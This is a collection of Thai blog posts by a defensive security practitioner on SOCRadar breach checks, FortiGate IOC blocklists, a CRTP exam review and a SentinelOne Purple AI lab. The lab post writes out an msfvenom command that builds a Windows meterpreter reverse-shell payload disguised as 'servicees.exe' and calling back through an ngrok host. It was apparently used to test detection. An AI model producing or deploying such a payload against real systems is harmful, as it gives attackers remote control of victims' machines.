#มือใหม่กำลังหัดเขียนมีอะไรแนะนำได้เลยนะครับ

#เป็นเพียงแนวคิดหรือความคิดของผู้เขียนผิดพลาดประการใดต้องขออภัยด้วยครับจัดทำขึ้นมาเพื่อShareครับโดยไม่มีจุดประสงค์อื่นครับ

สามารเข้ามาอ่าน Medium ด้านล่างได้นะครับจะเป็นวิธีการใช่งานเบื่องต้นครับผม!!!
Medium: https://so-sonajaa.medium.com/basic-data-breach-assessment-by-socradar-sign-up-free-edition-1761bd895098

สวัสดีครับทุกท่าน! 🌐
วันนี้ขอมาแชร์เรื่องน่าสนใจเกี่ยวกับ Data Breach Assessment หรือการรั่วไหลของข้อมูลนะครับ หลายคนอาจสงสัยว่า จะตรวจสอบได้อย่างไรว่าข้อมูลของเราไม่หลุดไปที่ไหน หรือโดนขายอยู่บน Dark Web?

Data Breach คืออะไร?
Data Breach หมายถึง การที่ข้อมูลสำคัญถูกเข้าถึงโดยไม่ได้รับอนุญาต เช่น ข้อมูลส่วนบุคคล ข้อมูลทางการเงิน ซึ่งอาจนำไปสู่ความเสี่ยงและความเสียหายได้

แล้วเราจะตรวจสอบได้อย่างไร?
วันนี้ผมขอแนะนำ SOCRadar แพลตฟอร์มที่ช่วยตรวจสอบว่าข้อมูลของคุณหลุดไปที่ไหนหรือเปล่า โดยเฉพาะข้อมูลบน Dark Web! แพลตฟอร์มนี้สามารถสมัครใช้งานฟรีได้ แต่ต้องใช้ Email Commercial ในการสมัครเท่านั้นนะครับ

วิธีใช้งาน SOCRadar:
1. ลงชื่อเข้าใช้ที่ SOCRadar
Sign Up Free ฮะ: ต้อง Login เข้าไป ค้นหาข้อมูลเอง
Ref: https://platform.socradar.com/login?next=/

ไม่ต้อง Sign Up สามารถ Search ได้เลย...จะเห็นข้อมูลแค่บางส่วน
Ref: https://socradar.io/labs/dark-web-report/
2. ตรวจสอบข้อมูลได้ทันทีว่ามีการรั่วไหลหรือไม่
3. ค้นหาข้อมูลที่เกี่ยวข้องกับ Domain ของคุณ เช่นอีเมล, Credentials ต่าง ๆ

ข้อควรระวัง: แม้ว่าจะพบข้อมูลที่หลุด ต้องตรวจสอบให้แน่ชัดว่าเป็นข้อมูลจริงก่อน ไม่ใช่ทุกการรั่วไหลจะมาจากการโดนแฮก แต่อาจเกิดจาก User นำข้อมูลไปใช้เองในแพลตฟอร์มอื่น ๆ แล้วข้อมูลหลุดมาจากที่นั่นก็เป็นได้ครับ “การรู้เท่าทันช่วยป้องกันได้ ลองนำข้อมูลเหล่านี้ไปใช้ดูนะครับ!”

Remark: ก่อนอื่นขอแจ้งให้ทราบว่าการแชร์เนื้อหานี้มีเป้าหมายเพื่อแบ่งปันความรู้และวิธีการตรวจสอบข้อมูล ในรูปแบบ Data Breach Assessment by SOCRadar เบื่องต้น เท่านั้น ไม่ได้มีเจตนาละเมิดข้อมูลแต่อย่างใดครับ

Ref: https://socradar.io/step-by-step-threat-hunting/
Ref: https://socradar.io/how-socradar-can-help-you-with-threat-hunting/
Ref: https://socradar.io/labs/dark-web-report/results/b483299bea3945889a92ec66ecd1f25e
Ref: https://socradar.io/labs/dark-web-report/results/e32ef86e0ee44a8e9d6e6b01f568b3e8

Telegram Cybersecurity:
https://telegramchannels.me/tag/cybersecurity
https://www.sentinelone.com/blog/top-10-telegram-cybersecurity-groups-you-should-join/

#หวังว่าเนื้อหานี้จะเป็นประโยชน์กับทุกคนครับ แล้วเจอกันใหม่ในบทความต่อไปครับ!
#แบ่งปัน
#เป็นเพียงแนวคิดหรือความคิดของผู้เขียนผิดพลาดประการใดต้องขออภัยด้วยครับ
#การเรียนรู้ไม่มีที่สิ้นสุด_เล่นไปเรื่อยๆ_ยิ่งเล่นยิ่งสนุก
#ผู้เขียนจัดทำเพื่อแชร์ความรู้และประสบการณ์นะครับผิดพลาดประการใดต้องขออภัยด้วยครับ
#มือใหม่กำลังหัดเขียนมีอะไรแนะนำได้เลยนะครับ

Basic Data Breach Assessment by “SOCRadar” Sign Up Free Edition สวัสดีครับทุกท่าน! 🌐 วันนี้ขอมาแชร์เรื่องน่าสนใจเกี่ยวกับ Data Breach Assessment หรือการรั่วไหลของข้อมูลนะครับ หลายคนอ....

#เป็นเพียงแนวคิดหรือความคิดของผู้เขียนผิดพลาดประการใดต้องขออภัยด้วยครับจัดทำขึ้นมาเพื่อShareครับโดยไม่มีจุดประสงค์อื่นครับ

สามารถติดตามได้ที่ Medium ครับ ขอบคุณฮะ.
Medium: https://so-sonajaa.medium.com/fortinet-fortigate-automatically-blocklist-ip-reputation-risk-59e5dd1d9f94

สวัสดีครับทุกคน! วันนี้ผมมีบทความเกี่ยวกับการตั้งค่า “FortiGate — Custom Blacklist” มาฝากครับ หลังจากที่ไม่ได้อัปเดตเนื้อหานานเพราะงานเยอะมาก เลยไม่มีเวลามา Share อะไรใหม่ ๆ วันนี้เลยถือโอกาสนำความรู้เรื่องนี้มาแบ่งปันกันครับ ถึงมันจะ เป็นเรื่องที่นาน แล้ว แต่คิดว่า มันหน้าสนใจครับ เลยเอามา Share ในวันนี้ครับ

ในทุกองค์กรปัจจุบันคงมี Firewall เป็นหนึ่งในเครื่องมือหลักในการปกป้องเครือข่ายอยู่แล้ว ซึ่ง Firewall มีหน้าที่ในการ Control Traffic ทั้งขาเข้าและขาออก แต่คำถามคือ เราจะมั่นใจได้อย่างไรว่า ทราฟฟิกขาออกจากเครื่อง Client ใน Network ของเรานั้นไปยัง IP หรือโดเมนที่ปลอดภัย? ใช่ครับ เราไม่สามารถรู้ได้แน่นอน แต่สิ่งที่เราทำได้คือ ให้ Firewall ของเราเป็นตัวช่วยในการตรวจสอบและบล็อกทราฟฟิกที่มีความเสี่ยงโดยอัตโนมัติ

ตัวอย่างเช่น FortiGate มีฟีเจอร์ External Connectors ที่ช่วยให้เราสามารถเชื่อมต่อกับแหล่งข้อมูล IOC (Indicators of Compromise) ภายนอกได้ เมื่อเราดึงข้อมูลจากหลาย ๆ แหล่งที่เชื่อถือได้เข้ามา เราก็สามารถตั้งค่าให้ Firewall ทำงานโดยอัตโนมัติในการบล็อกทราฟฟิกที่มีความเสี่ยงได้เลย ซึ่งจะช่วยลดภาระของ Admin ที่ต้องดูแลระบบไปได้เยอะเลยครับ (Automatic Blocklist IP Reputation)

การ Block Traffic จาก IP หรือโดเมนที่อยู่ในฐานข้อมูล IOC เหล่านี้เป็นแนวทางที่ดีในการป้องกันเครือข่ายของเรา เพราะเราไม่สามารถรู้ได้ว่าเครือข่ายของเรากำลังสื่อสารกับทราฟฟิกที่มีความเสี่ยงหรือไม่ ดังนั้น Solution Automatic Blocklist มาใช้ถือเป็นอีกหนึ่งวิธีที่หน้าสนใจเหมือนกันนะครับ

How to Config:
Ref: Integrating AbuseIPDB with Fortinet FortiGate — Automatically Block Abusive IPs
Ref: https://www.abuseipdb.com/fortinet

Example Source IOC: อันนี้คือ Free นะครับ ส่วนถ้าเป็น Commercial สามารถซื้อ ได้เลยนะครับ ถ้ามีตัง 5555
* URLhaus: https://urlhaus.abuse.ch/api/
* Botnet C2 IP Blocklist: https://feodotracker.abuse.ch/blocklist/
* Threatfeeds.io: https://threatfeeds.io/
Remark: ควรเลือกใช้แหล่งที่มาของ IOC ที่น่าเชื่อถือเพื่อป้องกันการเกิด False Positive และอย่าลืมเช็ค Log เพื่อดูว่ามีการบล็อก IP ที่ไม่ควรบล็อกหรือไม่ หากพบก็สามารถตั้งค่า Whitelist ได้ครับ

#หวังว่าเนื้อหานี้จะเป็นประโยชน์กับทุกคนครับ แล้วเจอกันใหม่ในบทความต่อไปครับ!
#แบ่งปัน
#เป็นเพียงแนวคิดหรือความคิดของผู้เขียนผิดพลาดประการใดต้องขออภัยด้วยครับ
#การเรียนรู้ไม่มีที่สิ้นสุด_เล่นไปเรื่อยๆ_ยิ่งเล่นยิ่งสนุก
#ผู้เขียนจัดทำเพื่อแชร์ความรู้และประสบการณ์นะครับผิดพลาดประการใดต้องขออภัยด้วยครับ
#มือใหม่กำลังหัดเขียนมีอะไรแนะนำได้เลยนะครับ

วัยรุ่นสองสี-เรียนรู้เพื่อที่จะป้องกัน--สวัสดีครับพี่น้อง ชาว Cybersecurity ทุก ๆ ท่านครับ วันนี้จะมาเล่าถึงการสอบ CRTP (Certified Red Team Professional) ของค่าย Altered Security ครับ ว่าในการสอบและเตรียมตัวในการสอบมีอะไรบ้างครับ ก่อนอื่นเลยสำหรับ ค่าย Altered Security นั้นจะมี Certificate ให้เราเรียนหลาย ตัวเลย แต่ผม เลือกที่จะเรียน CRTP เพราะส่วนตัวของผมเอง ทำงานในสาย Blue-Team หรือในสายงาน DFIR แบบว่า ชอบเป็นนักสืบโคนัน ครับ 555!! เพราะคิดว่า การไปทำ Case:DFIR นั้น ส่วนมากแล้ว Hacker ที่สามารถ Compromises เครื่องของเราได้แล้ว สุดท้ายแล้วก็ ต้องพยายามที่จะ ดำเนินการ Compromises Domain Controller ก็เลยคิดว่า CRTP ตัวนี้ อาจจะมีประโยชน์ ในการทำงาน หรือ มีประโยชน์ สำหรับการ Investigate & Analysis Case ที่มีการโจมตีมาที่ Domain Controller ครับ “แบบว่ารู้เขา-รู้เรา-รบร้อยครั้งชนะร้อยครั้ง” 5555!! เลยเลือกเรียน CRTP เพื่อที่จะ เพิ่มความรู้เกี่ยวกับ Red-Team ครับ และมันหน้าจะเป็น Certificate เริ่มต้น สำหรับการโจมตีมาที่ AD ครับ เอาละ โม้ มาหลายบรรทัด และ มาเข้าเรื่อง เกี่ยวกับ การ Review CRTP กันเลยดีกว่า ฮะ… อ่านต่อได้ที่ >> Medium: https://so-sonajaa.medium.com/review-exam-certified-red-team-professional-crtp-2af8c88fdaca

Ref: https://www.alteredsecurity.com/certifications
Ref: https://www.alteredsecurity.com/adlab
Ref: https://github.com/0xStarlight/CRTP-Notes
Ref: https://github.com/Abhinandan-Khurana/MY-CRTP-Notes

#แบ่งปัน
#เป็นเพียงแนวคิดหรือความคิดของผู้เขียนผิดพลาดประการใดต้องขออภัยด้วยครับ
#การเรียนรู้ไม่มีที่สิ้นสุด_เล่นไปเรื่อยๆ_ยิ่งเล่นยิ่งสนุก
#ผู้เขียนจัดทำเพื่อแชร์ความรู้และประสบการณ์นะครับผิดพลาดประการใดต้องขออภัยด้วยครับ
#มือใหม่กำลังหัดเขียนมีอะไรแนะนำได้เลยนะครับ

#เป็นเพียงแนวคิดหรือความคิดของผู้เขียนผิดพลาดประการใดต้องขออภัยด้วยครับจัดทำขึ้นมาเพื่อShareครับโดยไม่มีจุดประสงค์อื่นครับ

Medium: https://so-sonajaa.medium.com/ai-threat-hunting-by-sentinelone-4bacb4103b24

สำหรับการทำ Threat Hunting ก็คร่าว ๆ แล้วแต่ว่าเราจะใช่รูปแบบไหนแล้วกันครับ แต่สำหรับวันนี้ คือ "AI Threat Hunting" ที่จะมาเขียนก็คือ ได้มีโอกาศใช่งาน และ ทดสอบ Product [EDR] SentinelOne - Feature "AI Threat Hunting" หรือ มันชื่อว่า Purple AI นั้นเอง ครับ คือ ทำได้ขนาดนี้เลย หรอ… ปกติ การทำ Threat Hunting จะต้องใช่หลักการอะไรเยอะแยะไปหมด ต้องตรวจสอบหา ข้อมูลเยอะมาก แต่ สำหรับ Purple AI นั้น แค่เราพิมพ์ ข้อความ Prompts ลงไป ก็เหมือน AI ทั่วไป พวก Chart GPT, Gemini นั้นแหละครับ คร่าว ๆ ประมาณนี้ครับ เดียวไปดู ความสามารถ ของเจ้า Purple AI กันเลยฮะ!!!
เมื่ออยากรู้ก็ต้องลอง.!!! ก็ต้องตั้ง LAB เพื่อทดสอบดิครับ… คือ ฟังคนอื่นเล่า มา ยังไงก็ไม่เห็นภาพ…ต้องเห็นภาพด้วยตัวเอง ฮะ โดยตั้ง LAB ในครั้งนี้คือ ใช่ Proxy: ngrok and Generate File "msfvenom -p windows/meterpreter/reverse_tcp" ส้าง File ชื่อ "servicees.exe"

msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.tcp[.]ap[.]ngrok[.]io LPORT=16898 -f exe -o servicees.exe

--สามารถไปดูข้อมูลเพิ่มเติมต่อได้ที่ Medium: https://so-sonajaa.medium.com/ai-threat-hunting-by-sentinelone-4bacb4103b24

#แบ่งปัน
#เป็นเพียงแนวคิดหรือความคิดของผู้เขียนผิดพลาดประการใดต้องขออภัยด้วยครับ
#การเรียนรู้ไม่มีที่สิ้นสุด_เล่นไปเรื่อยๆ_ยิ่งเล่นยิ่งสนุก
#ผู้เขียนจัดทำเพื่อแชร์ความรู้และประสบการณ์นะครับผิดพลาดประการใดต้องขออภัยด้วยครับ
#มือใหม่กำลังหัดเขียนมีอะไรแนะนำได้เลยนะครับ